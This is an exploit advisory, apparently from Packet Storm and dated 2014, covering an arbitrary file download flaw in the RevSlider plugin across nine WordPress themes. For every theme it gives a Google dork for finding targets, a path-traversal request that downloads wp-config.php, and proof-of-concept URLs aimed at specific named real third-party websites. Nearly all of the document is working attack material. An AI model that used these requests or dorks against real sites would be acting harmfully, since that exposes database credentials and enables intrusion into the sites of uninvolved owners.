WordPress Ultimate, IncredibleWP, Ultimatum, Medicate, Centum, Avada, Striking, Beach, and CuckooTap Theme & eShop themes suffer from an arbitrary file download vulnerability. Note that this finding houses site-specific data.
bf222a16897642cbc16ceccceb7f65a592eac26d57d3fccb76735f024300c150# WordPress Ultimate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://www.techerhut.com/download-x-v1-7-5-the-ultimate-wordpress-theme-themeforest/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/ultimate/
# Patch vul : /wp-content/themes/ultimate/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.minutemarketingproductions.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.perfectsearchmedia.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress IncredibleWP Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://freelancewp.com/wordpress-theme/incredible-wp/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/IncredibleWP/
# Patch vul : /wp-content/themes/IncredibleWP/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.rjlwm.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.ledixtournai.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Ultimatum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://ultimatumtheme.com/ultimatum-themes/s
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/ultimatum
# Patch vul : /wp-content/themes/ultimatum/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://gerenscomunicacao.com.br/ngerens/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://fpea.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Medicate Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/medicate-responsive-medical-and-health-theme/3707916
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/medicate/
# Patch vul : /wp-content/themes/medicate/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.fisiorestelo.pt/cms/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.chirostnicolas.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Centum Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/centum-responsive-wordpress-theme/3216603
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Centum/
# Patch vul : /wp-content/themes/Centum/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.fit8.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.tourmasters.co.nz/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Avada Theme Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/avada-responsive-multipurpose-theme/2833226
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/Avada/
# Patch vul : /wp-content/themes/Avada/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.kobeyscozydesertoasis.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.cekaservices.fr/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Striking Theme & E-Commerce Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/striking-multiflex-ecommerce-responsive-wp-theme/128763
# Vendor Support: http://www.strikingsupport.com/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/striking_r/
# Patch vul : /wp-content/themes/striking_r/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.tedxissylesmoulineaux.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.nockmusique.ca/detente/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress Beach Apollo Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: https://www.authenticthemes.com/theme/apollo/
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/beach_apollo/
# Patch vul : /wp-content/themes/beach_apollo/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.electroejuice.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.vz777.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# WordPress CuckooTap Theme & eShop Arbitrary File Download
# Risk: High
# CWE number: CWE-200
# Author: Hugo Santiago
# Contact: hugo.s@linuxmail.org
# Date: 31/08/2014
# Vendor Homepage: http://themeforest.net/item/cuckootap-one-page-parallax-wp-theme-plus-eshop/3512405
# Tested on: Windows 7 and Gnu/Linux
# Google Dork: "Index of" +/wp-content/themes/cuckootap/
# Patch vul : /wp-content/themes/cuckootap/
# Exploit(Revslide):
http://victim/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
# PoC : http://www.parcferme.me/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
http://www.quiropraxiazan.com.br/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed